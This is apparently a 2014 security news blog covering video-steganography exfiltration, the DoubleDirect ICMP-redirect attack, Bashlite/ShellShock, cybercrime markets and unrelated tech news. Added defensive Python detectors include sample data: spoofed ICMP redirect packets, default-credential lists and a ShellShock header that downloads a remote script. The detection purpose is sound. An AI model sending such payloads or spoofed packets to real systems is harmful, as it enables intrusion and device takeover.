Saturday, 29 November 2014

Payload hidden in video.

Security experts have detected an attack against a major firm that used a data exfiltration technique based on video steganography.

Threat actors in the wild are exfiltrating data by uploading video to cloud services. Attackers adopted this trick to move data out of a compromised target without being detected by conventional defences such as intrusion detection/prevention systems. To make the tactic harder to spot, they use steganography to hide encrypted data inside videos uploaded to an unmonitored video-sharing service.

Why only videos and not images?

Security experts know that several tools can detect the use of steganography in images: they look for signatures of common steganography tools and techniques. The situation is quite different for video, and the threat actors using the exfiltration technique described here know it.

The attackers can use one of several off-the-shelf or open source tools (e.g. OpenPuff) to embed the exfiltrated data. As revealed by TripWire in a blog post, one of the Fortune 500 companies was recently hit by hackers who used this technique to exfiltrate data.


The data exfiltration went undetected until the company noticed several duplicate video files had been uploaded from their network to a video sharing website.

There are a number of tools available that can detect the presence of steganography in images on a network, from software to appliances designed specifically to detect signatures of common steganography tools and techniques. The problem is that they are generally designed to detect steganography in images, not video. The groups using this exfiltration technique are well aware of this, which is why they use video instead of images, even though images would be an easier transport mechanism.

As a mitigation strategy, network administrators are advised to monitor for the installation of applications or custom binaries used by attackers to encode data into a video or an image; administrators should already be monitoring assets for new binaries on hosts. Administrators also need to monitor outgoing connections to external services that could

Another way to detect the software used in this exfiltration technique is to scan host systems for video files, especially on the assets that are critical to the network.

Monitoring a host's connections to external services also lets administrators spot suspicious activity.

As explained by TripWire, in the case of the targeted Fortune 500 company the attackers reused the same videos to carry different pieces of data out of the network, which is what produced the duplicate uploads the company eventually noticed.
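The two host-side checks above (look for video files on critical assets, and the duplicate-upload clue that exposed the Fortune 500 case) can be combined into a single scan. The following Python script is an added example, not code from the original post or from TripWire: it walks a directory tree, hashes every video file, reports exact duplicates, flags files of identical size with different content (one carrier reused with different payloads), and then checks whether such pairs differ only in the lowest bit of some bytes, the byte-level fingerprint of naive LSB embedding into an uncompressed carrier. The sample tree it builds is constructed data; the extension list and the LSB heuristic are assumptions, and a carrier that was re-encoded after embedding would not show the LSB pattern, so treat the same-size-different-hash signal as the more general one.

```python
import hashlib
import os
import random
import tempfile
from collections import defaultdict

# Extensions treated as video carriers; assumption, extend for your environment.
VIDEO_EXTENSIONS = {".mp4", ".mkv", ".avi", ".mov", ".webm", ".flv", ".yuv"}


def sha256_file(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def find_video_files(root):
    """Walk a host's filesystem subtree and yield paths that look like video files."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() in VIDEO_EXTENSIONS:
                yield os.path.join(dirpath, name)


def diff_profile(path_a, path_b, chunk=1 << 16):
    """Return (differing_bytes, max_xor) for two same-size files. max_xor <= 1 means
    only the lowest bit of any byte ever changed: the byte-level fingerprint of naive
    LSB embedding into an uncompressed carrier."""
    differing, max_xor = 0, 0
    with open(path_a, "rb") as fa, open(path_b, "rb") as fb:
        while True:
            ca, cb = fa.read(chunk), fb.read(chunk)
            if not ca and not cb:
                break
            for x, y in zip(ca, cb):
                if x != y:
                    differing += 1
                    max_xor = max(max_xor, x ^ y)
    return differing, max_xor


def suspect_carriers(paths):
    """Group files by size, then by content hash. Same size + different hash is the
    signature of one carrier reused with different payloads (the Fortune 500 case);
    identical hashes are plain duplicate uploads."""
    by_size = defaultdict(lambda: defaultdict(list))
    for p in paths:
        by_size[os.path.getsize(p)][sha256_file(p)].append(p)
    report = {"exact_duplicates": [], "same_size_variants": [], "lsb_only_pairs": []}
    for by_hash in by_size.values():
        for files in by_hash.values():
            if len(files) > 1:
                report["exact_duplicates"].append(sorted(files))
        if len(by_hash) > 1:
            reps = sorted(files[0] for files in by_hash.values())
            report["same_size_variants"].append(reps)
            for i in range(len(reps)):
                for j in range(i + 1, len(reps)):
                    n, mx = diff_profile(reps[i], reps[j])
                    if n and mx <= 1:
                        report["lsb_only_pairs"].append((reps[i], reps[j], n))
    return report


def build_sample_tree():
    """Constructed sample data, not from any real incident: one 8 KiB pseudo-random
    carrier, an exact copy, a copy with the LSB of every 64th byte flipped (a fake
    embedded payload), and a text file the scanner must ignore."""
    root = tempfile.mkdtemp(prefix="stego-scan-")
    os.makedirs(os.path.join(root, "uploads"))
    rng = random.Random(2014)
    carrier = bytes(rng.getrandbits(8) for _ in range(8192))
    stego = bytearray(carrier)
    for i in range(0, len(stego), 64):
        stego[i] ^= 0x01
    paths = {
        "orig": os.path.join(root, "clip.mp4"),
        "copy": os.path.join(root, "uploads", "clip.mp4"),
        "stego": os.path.join(root, "uploads", "clip_v2.mp4"),
    }
    for key, data in (("orig", carrier), ("copy", carrier), ("stego", bytes(stego))):
        with open(paths[key], "wb") as f:
            f.write(data)
    with open(os.path.join(root, "notes.txt"), "w") as f:
        f.write("not a video\n")
    return root, paths


if __name__ == "__main__":
    root, _ = build_sample_tree()
    for kind, entries in suspect_carriers(sorted(find_video_files(root))).items():
        print(kind, entries)
```

Run it against a real upload staging directory or a critical server's home directories instead of the sample tree; the exact-duplicate list is the signal the Fortune 500 company caught, and the same-size-variant list is what reused carriers look like before they leave the network.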

Pierluigi Paganini

(Security Affairs –  Data exfiltration, cybercrime)

Friday, 28 November 2014

Repentant hacker wants a legal job.

London - Ryan Ackroyd fidgeted nervously with the microphone clipped to his shirt as about 200 fellow students packed an auditorium at Sheffield Hallam University.
"This is the first talk I've ever given," he said, after being introduced as a former hacker and current student. "I did some very, very bad things."
Ackroyd, 27, and three other members of the hacker group LulzSec were jailed in 2013. The group's members, who never met in person, took down the websites of Sony, News Corp., the CIA and the Arizona police.
They also targeted the U.S. Air Force and Britain's National Health Service.
"The companies suffered serious financial and reputational damage," said Andrew Hadik, a British prosecutor, after the four were sentenced in May 2013.
Ackroyd, who had pleaded guilty to the charges, was sentenced to 30 months in prison and served nine months.
Released in early February, he is studying for a master's degree in information systems security at Sheffield Hallam, about three hours north of London by train.
In his talk to the students, on 25 November, he said he regretted what he had done and hoped to put his skills to better use.
Could the same talents that put Ackroyd in prison one day earn him a six-figure annual salary?
Companies "recognise that there is a perfect storm of cyber security going on and that there aren't enough professionals to meet their needs," said Del Heppenstall, a director at KPMG LLP who works in information security.
"That has left a gap in the market."
Self-taught
Ackroyd, who left school at 16, taught himself to read computer code.
He started hacking at 11 or 12, at first because he wanted to cheat at computer games by altering the code to get infinite lives or invincibility. It proved addictive.
"Getting into a server was something I saw purely as a challenge," he said in the Sheffield talk, which he titled LulzSec, 50 Days of Lulz. "If I couldn't get in, that just made me want it even more."
LulzSec was an offshoot of the Anonymous group, formed by online activists who attacked the websites of PayPal and MasterCard when those companies stopped processing payments to WikiLeaks after the organisation published U.S. military information.
The name derives from the phrase "laughing at security," Ackroyd said, because they found online security so bad that it deserved their contempt.
A handful of LulzSec members accessed millions of usernames and e-mail addresses from Sony's server and intercepted FBI communications from a private contractor's computer system, Ackroyd said.
Rising costs
The damage caused by hackers helps explain why there is so much demand for cyber security specialists.
On average, major incidents cost companies 1 million pounds (US$1.57 million), double the figure of a year ago, said Giles Smith, an official at the U.K. Department for Business, Innovation and Skills, at a conference in London last week.
Ackroyd received information technology training while in prison and hopes to build a career in ethical hacking, although he acknowledges it may be hard for employers to trust him.
Stephanie Crates, a consultant at the London recruitment agency Harvey Nash, said senior penetration testers -- the so-called "white hat" hackers who test security systems by trying to break into them -- can earn up to 90,000 pounds a year, or 900 pounds a day as contractors.
"It's highly likely that companies are already hiring hackers and ex-hackers, whether or not they know about those skills, if they were never caught," Crates said.
KPMG published a survey earlier this month titled "Hire a Hacker to Solve Cyber Skills Crisis, Say U.K. Companies."
More than half of the companies that took part in the KPMG survey said they would consider employing an IT specialist with a criminal record.
"Now that I'm out of prison, I feel a bit more optimistic," he said. "I wanted to study; I hope it takes me somewhere good."

Saturday, 22 November 2014

New kind of MitM

Security experts at Zimperium discovered a new MITM attack technique dubbed DoubleDirect that is targeting iOS, Android and Mac users worldwide.

DoubleDirect is the name of a new Man-in-the-Middle (MitM) attack discovered by security researchers that targets mobile devices running iOS or Android and potentially Mac OS X systems.

The DoubleDirect MitM attack lets an attacker redirect the victim's traffic to major websites such as Facebook, Google and Twitter through a device under the attacker's control.

As explained by security experts at mobile security firm Zimperium, once the attacker has redirected the victim's traffic, he can steal the victim's sensitive data, including personal data and login credentials, or serve malicious code to the targeted device.

In a blog post recently published by Zimperium, the experts revealed that threat actors worldwide are already exploiting the DoubleDirect technique across 31 countries. Bad actors redirected users of services run by several companies, including Facebook, Google, Hotmail, Live.com and Twitter.


The DoubleDirect technique abuses ICMP (Internet Control Message Protocol) redirect packets, which routers use to tell a host about a better first hop for a given destination, in order to alter the host's routing table.

“With the detection of DoubleDirect in the wild we understood that the attackers are using previously unknown implementation to achieve full-duplex MITMs using ICMP Redirect” states the post.

As the experts explain, most Windows and GNU/Linux desktop systems are immune to DoubleDirect because they do not accept the ICMP redirect packets the attackers use to divert traffic.
“An attacker can also use ICMP Redirect packets to alter the routing tables on the victim host, causing the traffic to flow via an arbitrary network path for a particular IP,” Zimperium warned. “As a result, the attacker can launch a MitM attack, redirecting the victim’s traffic to his device.“

“Once redirected, the attacker can compromise the mobile device by chaining the attack with an additional Client Side vulnerability (e.g.: browser vulnerability), and in turn, provide an attack with access to the corporate network.“

Zimperium has published a Proof-of-Concept (PoC) for the DoubleDirect attack. The code performs a full-duplex ICMP redirect attack by predicting which IP addresses the victim is about to connect to: the addresses are learned by sniffing the target's DNS traffic, and once they are known the attacker sends an ICMP redirect packet for each of them.
"We have investigated the attacks and also created a POC tool to prove that it is possible to perform full-duplex ICMP Redirect attacks. ICMP Redirect attacks are not easy to emulate because the attacker must know beforehand which IP address the victim has accessed."
The experts at Zimperium also explained how to manually disable ICMP redirects on Macs to remediate the issue.
"Zimperium is releasing this information at this time to increase awareness as some operating system vendors have yet to implement protection at this point from ICMP Redirect attacks as there are attacks in-the-wild," the post reads.
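ICMP redirect packets look the same whether they come from the real router or from an attacker spoofing its address, so the useful network-side check is whether the advertised new gateway is a router you actually know. The following Python script is an added example, not Zimperium's PoC or code from the original post: it builds byte-accurate sample packets (constructed, not captured), parses the IPv4 and ICMP headers, and flags every type 5 redirect whose new gateway is outside an allowlist. The addresses, the allowlist and the one-redirect-per-destination shape of the sample are assumptions.

```python
import ipaddress
import struct

ICMP_PROTO = 1
ICMP_REDIRECT = 5
REDIRECT_CODES = {0: "network", 1: "host", 2: "tos+network", 3: "tos+host"}


def _checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum used by both the IPv4 and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Minimal IPv4 datagram (no options) so the sample packets are byte-accurate."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", _checksum(hdr)) + hdr[12:]
    return hdr + payload


def build_icmp_redirect(sender: str, victim: str, new_gateway: str,
                        orig_dst: str, code: int = 1) -> bytes:
    """ICMP type 5: 'send traffic for orig_dst via new_gateway'. Per RFC 792 the body
    carries the victim's own IP header plus 8 bytes of the datagram that triggered it."""
    triggering = build_ipv4(victim, orig_dst, 6, b"\x00\x50\x01\xbb\x00\x00\x00\x00")
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, code, 0,
                       ipaddress.IPv4Address(new_gateway).packed) + triggering[:28]
    icmp = icmp[:2] + struct.pack("!H", _checksum(icmp)) + icmp[4:]
    return build_ipv4(sender, victim, ICMP_PROTO, icmp)


def parse_ipv4(pkt: bytes):
    ver_ihl, _, total, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    return (str(ipaddress.IPv4Address(src)), str(ipaddress.IPv4Address(dst)),
            proto, pkt[ihl:total])


def inspect_redirects(packets, legitimate_gateways):
    """Return every ICMP redirect seen, flagging those whose new gateway is not a
    router we know about. That is the DoubleDirect signature on the wire, since the
    source address is trivially spoofed to look like the real gateway."""
    findings = []
    for pkt in packets:
        src, dst, proto, payload = parse_ipv4(pkt)
        if proto != ICMP_PROTO or len(payload) < 8 + 20:
            continue
        itype, code, _, gw = struct.unpack("!BBH4s", payload[:8])
        if itype != ICMP_REDIRECT:
            continue
        _, target, _, _ = parse_ipv4(payload[8:])
        new_gw = str(ipaddress.IPv4Address(gw))
        findings.append({
            "claimed_router": src, "victim": dst, "target": target,
            "new_gateway": new_gw, "scope": REDIRECT_CODES.get(code, "unknown"),
            "suspicious": new_gw not in legitimate_gateways,
        })
    return findings


def sample_packets():
    """Constructed traffic (not a real capture): a normal TCP packet, a benign redirect
    from the real gateway to a second known router, and a DoubleDirect-style redirect
    spoofed from the gateway address that points the victim at 192.168.1.77."""
    return [
        build_ipv4("192.168.1.10", "203.0.113.5", 6, b"\x00\x50\x01\xbb\x00\x00\x00\x00"),
        build_icmp_redirect("192.168.1.1", "192.168.1.10", "192.168.1.2", "203.0.113.5"),
        build_icmp_redirect("192.168.1.1", "192.168.1.10", "192.168.1.77", "203.0.113.5"),
    ]


if __name__ == "__main__":
    for finding in inspect_redirects(sample_packets(), {"192.168.1.1", "192.168.1.2"}):
        print(finding)
```

On the host side the remediation Zimperium describes is simply to ignore redirects: on Linux the sysctl is net.ipv4.conf.all.accept_redirects=0, and on Mac OS X the equivalent knobs are net.inet.icmp.drop_redirect=1 (with net.inet.icmp.log_redirect=1 if you want attempts logged). A full-duplex DoubleDirect run shows up in this detector as a burst of redirects, one per destination the victim resolved via DNS, all pointing at the same unknown gateway.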

Balloons to bring internet to remote areas.

Google has revealed some details of Project Loon, which will use balloons to bring internet to remote areas. Among the figures, the company says the balloons are now much more durable, able to stay aloft for 100 days, 10 times longer than last year.

The company has also made great progress in its balloon-inflation techniques, managing to fill them with gas in just 5 minutes. This lets it launch up to 20 balloons a day, far more than was possible before.

Another interesting figure is that the balloons Google has already launched, which float through the stratosphere and rise or descend to catch the right air currents, have travelled about 3 million kilometres, enough for four round trips to the moon.

This navigation technique has been refined recently. According to the company, constant trajectory simulations let the balloons reach their destinations far more precisely than at first. In one case a balloon travelled about 9,000 kilometres and ended up just 1.5 km from its target, purely by calculating the stratospheric wind currents.

The company expects to sign partnerships with telecom operators to distribute the signal, which means it will probably not be Google distributing it but carriers such as TIM, Claro, Oi and Vivo. They will get access to the balloons for transmission from the stratosphere, at a cost expected to be lower than deploying all the necessary ground infrastructure.

First submarine built in Brazil undergoes maintenance.

First submarine built in Brazil, Tamoio, performs "load-in" to begin its maintenance period in Rio
Brasília, 21/11/2014 - After 20 years of good service to the Brazilian Navy patrolling and protecting the so-called "Blue Amazon", an ocean area of 4.5 million km² rich in natural resources, the submarine Tamoio (S-31) has begun a new maintenance period.

The overhaul, carried out every six years, is intended to restore its equipment and systems to operating condition.

According to the director of the Rio de Janeiro Naval Arsenal (AMRJ), Rear Admiral Mário Ferreira Botelho, the maintenance follows strict quality criteria, which is essential to guarantee and restore the submarine's operational capability.

"During this period various mechanical, electrical and electronic systems are repaired, and structural inspections are carried out, including possible repairs to the pressure hull," the admiral explained.

At the start of the process the submarine Tamoio was taken out of the water and moved into an AMRJ shed. In this procedure, known as load-in, the submarine "lands" on a flooded barge inside a dry dock. After the water is pumped out, the barge is raised, allowing the submarine to be moved and aligned with the shed together with the barge.

After that stage, the vessel was moved from the barge into the shed by two trailers, with careful engineering calculations, in a job that took more than four hours.

Brazil is the only country in the Southern Hemisphere with the know-how to perform a submarine load-in. Navy personnel spent 20 days of intense planning and preparation for the whole operation.

Submarine Force

While Tamoio (S31) is under maintenance, the submarines Tupi (S30), Timbira (S32), Tapajó (S33) and Tikuna (S34) remain on patrol and surveillance duty along the national coast.

In addition, the Navy will commission five new submarines, currently under development as a result of the partnership between Brazil and France. The agreement provides for technology transfer from the Scorpène design.

Four of these are diesel-electric and in Brazil will be designated S-BR. The fifth, nuclear-powered, will be built at the Itaguaí (RJ) shipyard and naval base with entirely domestic technology.

The five submarines will join the Submarine Force, which turned 100 in 2014.

Submarine Tamoio and the history of Brazil

Throughout its current operating cycle, begun in 2005, the submarine Tamoio took part in numerous operations across the country, patrolling strategic areas such as the pre-salt oil basins.

Commissioned into the Brazilian Navy in 1995, Tamoio was christened and launched in 1993 and over that period has undergone numerous operational tests. The Tupi-class submarine is of German design, built with Brazilian technology.

"Building the IKL-209-class submarines (the serial number the manufacturer assigned to this design) in the country fulfilled an important aspiration of the Navy. Worldwide technological development, as well as relations between countries, have turned the submarine into a weapon of fundamental importance for exercising control of the sea," added Admiral Mário Ferreira.

Submarines are vessels specialised to operate submerged and, because of that, are also used militarily for being hard to locate and destroy. The Navy currently has five submarines: four Tupi-class, designed in 1989, and one Tikuna-class, designed in 2005. All displace 1,400 tonnes.



Friday, 21 November 2014

Intel and Europol together to combat cybercrime


An MOU between Intel Security and Europol will see the two combine resources and expertise in combating cybercrime. As cybercriminals advance their techniques and expertise, it is paramount that those on the receiving end present a united front rather than be picked off one at a time.

Europol received a boost in its fight against cybercrime after McAfee signed an MOU to help shore up Europol's security operations. The MOU will see the two combine resources and expertise to form a solid defence against cybercrime on an already porous battle line.

McAfee, acquired by Intel in 2010 and now part of the Intel Security group, will offer technical support to Europol in addition to participating in joint cybercrime operations and sharing non-operational data on cybercrime. With its approach to internet security and its broad global threat intelligence, Intel Security will be an important strategic ally for the EU's top cops.

"Cybercrime has advanced to a degree that no one entity can combat it alone," said Raj Samani, chief technology officer for EMEA at Intel Security and special advisor to the EUROPOL Cybercrime Centre on Internet Security. "I'm excited to work with the excellent team at Europol and contribute expertise so that together we can effectively address the cybercrime problem."

High-profile attacks such as those on JPMorgan, the White House and Target clearly show that cybercriminals are advancing their techniques and expertise, often leaving law enforcement a step behind. In such an environment it is paramount that all those on the receiving end, law enforcement agencies included, present a united front, a fact Troels Oerting, head of EC3, acknowledged when welcoming Intel on board. "Today we add the resources of Intel Security to our list of capabilities dedicated to protecting our digital lives. This task cannot be done by law enforcement alone, and requires a much broader approach," said Oerting.

Apparently, McAfee and Europol have partnered on cybercrime before, and the MOU signed on Wednesday was meant to formalise and expand their cooperation. "Intel Security has assisted the European Cybercrime Centre (EC3) in the past and, with the signing of this MOU, our cooperation will continue to the benefit of all law-abiding users of the Internet and to the disadvantage of cybercriminals," said Oerting in a press release.

In the past, cyber security firms have mostly cooperated with law enforcement agencies through informal arrangements. The new MOU between Intel Security and Europol marks a new era of cooperation in fighting cybercrime, with more security firms expected to come on board in the coming days.

EU member states have also shown unprecedented cooperation in the war against cybercrime. Over 30 states have now ratified the Council of Europe's Convention on Cybercrime, an international treaty that seeks to harmonise cybercrime laws among party states and provides for a 24/7 network of national contact points so that cross-border cybercrime investigations can get assistance in real time.

Europol is a cross-border agency that helps combat international crime in the European Union. Its cybercrime unit, the European Cybercrime Centre (EC3), located in The Hague, offers technical support to the cybercrime units of EU member states. EC3, formed last year, relies on Europol's extensive network to help member states investigate and combat cybercrime, including the state-backed cyber-espionage attacks that currently dominate the headlines.

Thursday, 20 November 2014

Brazilian cybercrime picture


Trend Micro has published a new study on underground cyber-markets, this time focusing on the products and services offered in the Brazilian underground.

This is the third Trend Micro report on underground cyber-markets; the previous two analysed the Russian and Chinese marketplaces.

Like the previous analyses, the new study describes a thriving marketplace in which cyber criminals offer their services and products to criminal crews that, instead of building their own attack tools from scratch, can buy from a competitive catalogue. The study surveys the main products and services sold to crooks under a crime-as-a-service model that keeps attracting new actors into the cyber arena.

The first figure that catches the experts' attention is the recent drop in prices, a further attraction for criminals looking at cybercrime with growing interest.

“The barriers to launching cybercrime have decreased. Toolkits are becoming more available and cheaper; some are even offered free of charge. Prices are lower and features are richer. Underground forums are thriving worldwide, particularly in Russia, China, and Brazil. These have become popular means to sell products and services to cybercriminals in the said countries. Cybercriminals are also making use of the Deep Web to sell products and services outside the indexed or searchable World Wide Web, making their online “shops” harder for law enforcement to find and take down.” states the ‘The Brazilian Underground Market’ report.

Another element that distinguishes the Brazilian underground from the Russian and Chinese ones is the availability of training services, which is why the Brazilian underground ecosystem is also regarded as the market for cybercriminal wannabes.

“What distinguishes the Brazilian underground from others is the fact that it also offers training services for cybercriminal wannabes,” according to the whitepaper. “Cybercriminals in Brazil particularly offer FUD (fully undetectable) crypter programming and fraud training by selling how-to videos and providing support services via Skype. Anyone who is Internet savvy and has basic computing knowledge and skill can avail of training services to become cybercriminals. How-to videos and forums where they can exchange information with peers abound underground. Several trainers offer services as well. They even offer support when training ends.”

Brazilian cyber criminals also appear far bolder in their use of mainstream platforms such as Facebook, YouTube, Twitter, Skype and WhatsApp, unlike Russian and Chinese players that "hide in the Deep Web and use tools that ordinary users do not such as Internet Relay Chat (IRC) channels".

For several years Brazil has been known for its banking Trojans: much of this malware was written by Brazilians, targeted domestic online-banking users and implemented several techniques to steal victims' credentials. Brazil ranks second worldwide for online banking fraud and malware infection; on a global scale it accounts for almost 9% of the total number of online-banking malicious code that compromised


Banking Trojan source code sells for around US$386; buyers can then modify it to their needs, obfuscating strings, customising the payload composition and adding crypters and other evasion layers. Another very popular product is the bolware kit, a toolkit for building malware that tampers with Brazilian "boleto" payment slips, offered for around US$155; these kits are user-friendly and ship with an easy-to-use control panel for monitoring and managing infections and malicious activity.


The Brazilian underground also offers bank fraud courses for aspiring cyber criminals. The courses are well structured and give beginners detailed information on the criminal trade: they start by presenting the fraud workflow and the tools needed to set up a fraud, and some are organised in modules that walk wannabes through the illegal practices with interactive guides and practical exercises (e.g. simulated attacks). A 10-module course, for example, is offered for US$468; the operators also provide updates and a Skype contact service.

According to the author of the study, Trend Micro Senior Threat Researcher Fernando Merces, several factors have contributed to the growth of cyber-criminal activity in the country, such as the limited resources assigned to law enforcement and the existence of a flexible underground market.

“For example, Brazil has a lack of concrete laws and limited law enforcement agency resources that address cybercrime in the country,” he noted. “Additionally, the technological and consumer landscape in Brazil, which has a 50% Internet penetration rate, and a 69% credit card penetration rate, has made the country all too appealing for cybercriminals. However, another factor may have also contributed to Brazilian cybercrime: the existence of a flexible underground market with different offerings, ranging from banking Trojan development to online fraud training. The latter is highly notable as this is the most unique item in the market, which may not be found in other underground markets.” explained Merces in a blog post. 

The report details prices and products for many other offerings, including credit card credentials and number generators, SMS-spamming services and phishing pages for popular banks.

Let me close the post with a telling statement from the author of the study on how easy it is today to become a dangerous cyber criminal with limited resources.

“In Brazil, it’s possible to start a new career in cybercrime armed with only US$500,” Merces blogged. “Would-be cybercriminals are supported and helped by tools, forums, and experts from the dark side of the Internet. These bad guys do not fear the authorities and their groups get bigger in a short span of time.”

I suggest reading the full report published by Trend Micro; it is full of interesting data.

Pierluigi Paganini

(Security Affairs –  Brazilian underground, cybercrime)

Tuesday, 18 November 2014

Cybercriminals use Bash vulnerability

Cyber criminals are using new malware variants that exploit the GNU Bash vulnerability known as ShellShock (CVE-2014-6271) to infect embedded devices running BusyBox, according to a researcher.

A new variant of the Bashlite malware targeting devices running BusyBox was spotted by researchers at Trend Micro shortly after the public disclosure of the ShellShock vulnerability.

BusyBox provides set of command line utilities that are specifically designed to run in constrained embedded environments. At compile time, different capabilities can be left out, reducing the size of the binaries, and efforts are made to make them memory efficient. This makes the software an excellent candidate for use in consumer electronics devices, which seem to have been the items of interest in this case.

The malware variant, detected as ELF_BASHLITE.A (ELF_FLOODER.W), when executed on a victim's machine scans the compromised network for devices such as routers and Android phones running BusyBox and brute-forces their logins with a preset list of usernames and passwords.

Once a connection is established, the variant runs a command to download and execute the bin.sh and bin2.sh scripts to gain control over the BusyBox system. This newer version of Bashlite is therefore designed not only to identify systems running BusyBox but also to hijack them.
"Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive," threat response engineer at Trend Micro, Rhena Inocencio wrote on a blog post.
"As such, a remote attacker can issue commands or download other files on the devices thus compromising its security."
The miscreants attempt to log in using a predefined list of usernames, including 'root', 'admin' and 'support', and a list of common and default passwords such as 'root', 'admin', '12345', 'pass', 'password', '123456' and so on.

Trend Micro's Inocencio urged users to change default usernames and passwords to stay on the safer side, and also to disable remote shells where possible to prevent their exploitation.

Bashlite carries the ShellShock exploit as its payload, and threat actors have used this critical Bash command-injection vulnerability (CVE-2014-6271) to build botnets from hijacked devices, launch distributed denial-of-service (DDoS) attacks and target network-attached storage boxes, among other things.
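Two things in this post are easy to check for on a perimeter or device log: the CVE-2014-6271 trigger (an HTTP header whose value begins with a bash function definition, `() { ... };`, followed by the command a vulnerable shell executes when the CGI server exports that header as an environment variable), and the credential-stuffing pattern from the username/password list above. The following Python script is an added example, not code from Trend Micro or from the Bashlite sample: it scans raw HTTP requests for the trigger in any header and groups failed logins per source address against that default-credential list. The request and syslog samples are constructed, the login-failure log format is an assumption (adjust LOGIN_FAIL_RE to your device's syslog), and the threshold is arbitrary.

```python
import re
from collections import defaultdict

# CVE-2014-6271 trigger: a value that opens with a bash function definition "() {"
# and carries a trailing command after the closing brace. The regex is an assumption
# tuned for log scanning, not a model of bash's exact parser behaviour.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{.*?\}\s*;")

# Username and password lists quoted in the post as the ones Bashlite tries.
DEFAULT_USERS = {"root", "admin", "support"}
DEFAULT_PASSWORDS = {"root", "admin", "12345", "pass", "password", "123456"}


def is_shellshock_payload(value: str) -> bool:
    return SHELLSHOCK_RE.search(value) is not None


def scan_http_requests(requests):
    """Return (header, value) pairs carrying the trigger. Every header is checked,
    because a CGI server copies arbitrary client headers into environment variables."""
    hits = []
    for raw in requests:
        head = raw.partition("\r\n\r\n")[0]
        for line in head.split("\r\n")[1:]:          # skip the request line
            name, sep, value = line.partition(":")
            if sep and is_shellshock_payload(value.strip()):
                hits.append((name.strip(), value.strip()))
    return hits


# Constructed syslog shape for a failed telnet/ssh login; adjust to your device.
LOGIN_FAIL_RE = re.compile(
    r"login failed user=(?P<user>\S+) pass=(?P<pw>\S*) src=(?P<src>[\d.]+)")


def find_default_cred_bruteforce(log_lines, threshold=3):
    """Sources that tried at least `threshold` username/password pairs straight
    from the default list; a single mistyped password from a real user does not match."""
    attempts = defaultdict(list)
    for line in log_lines:
        m = LOGIN_FAIL_RE.search(line)
        if m and m["user"] in DEFAULT_USERS and m["pw"] in DEFAULT_PASSWORDS:
            attempts[m["src"]].append((m["user"], m["pw"]))
    return {src: tries for src, tries in attempts.items() if len(tries) >= threshold}


# Constructed samples (not captured traffic); addresses are from the
# documentation ranges 192.0.2.0/24 and 198.51.100.0/24.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/status HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "User-Agent: () { :; }; /bin/bash -c 'wget http://198.51.100.7/bin.sh -O /tmp/bin.sh'\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.1\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /cgi-bin/test HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "Referer: () { ignored; }; echo pwned\r\nCookie: a=b\r\n\r\n",
]

SAMPLE_LOG = [
    "Nov 18 02:11:05 gw telnetd: login failed user=root pass=root src=198.51.100.7",
    "Nov 18 02:11:06 gw telnetd: login failed user=admin pass=admin src=198.51.100.7",
    "Nov 18 02:11:07 gw telnetd: login failed user=root pass=12345 src=198.51.100.7",
    "Nov 18 02:11:08 gw telnetd: login failed user=support pass=support src=198.51.100.7",
    "Nov 18 02:15:40 gw telnetd: login failed user=alice pass=hunter2 src=198.51.100.9",
    "Nov 18 02:15:41 gw telnetd: login failed user=root pass=password src=198.51.100.9",
]

if __name__ == "__main__":
    print(scan_http_requests(SAMPLE_REQUESTS))
    print(find_default_cred_bruteforce(SAMPLE_LOG))
```

The header scan is a signature, so it only catches the documented trigger shape; the quickest check on the device itself is still the well-known one-liner `env x='() { :;}; echo vulnerable' bash -c "echo test"`, which prints "vulnerable" on an unpatched bash. Note that the brute-force detector ignores 'support'/'support' because that password is not on the page's list; extend DEFAULT_PASSWORDS with whatever your own devices shipped with.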

The critical ShellShock Bash bug was disclosed on September 24, and by September 30 security firms estimated that attacks using the exploit could top 1 billion, while more than 1,000 organizations patched ShellShock as fixes became available.

EASE, the DHS concept of self-repairing networks


by Pierluigi Paganini on November 18th, 2014

The Department of Homeland Security is working with industry on the EASE concept, self-repairing systems able to avoid interruption of operations.

The Department of Homeland Security is working on a new generation of self-repairing network that is resilient to cyber offensives and continues operating while under attack.
Enterprise Automated Security Environment (EASE) is the name of the project the DHS is conducting with industry to develop an automated cyber defense system, as Philip Quade, chief operating officer of the National Security Agency's information assurance directorate, explained to Nextgov.
Security experts consider resiliency an essential characteristic of future networks: cyber attacks are becoming more sophisticated and frequent, and computer systems must be improved to remain operational despite an ongoing offensive.
In recent weeks several attacks have hit government networks, causing data breaches and temporary shutdowns of infrastructure, as happened in the attacks against the White House, the U.S. Postal Service and the National Weather Service.
The goal is a network of computers able to keep activities running and protect sensitive information.
Currently, government entities have deployed a series of internal controls to detect attacks early and recover quickly from them. EASE is an ambitious project and, although it is at a very early stage, the Department of Homeland Security is putting great effort into its realization.
The EASE project will build on the US Government's ongoing network surveillance program, which has been allocated $6 billion.
“EASE is an evolving concept aimed at further automating the detection and prevention of cyber intrusions against federal government networks by creating a suite of technologies to augment existing methods,” DHS spokesman S.Y. Lee said in an email.
That surveillance program, dubbed "continuous diagnostics and mitigation," is being developed by US authorities to monitor all federal networks for threats in real time.
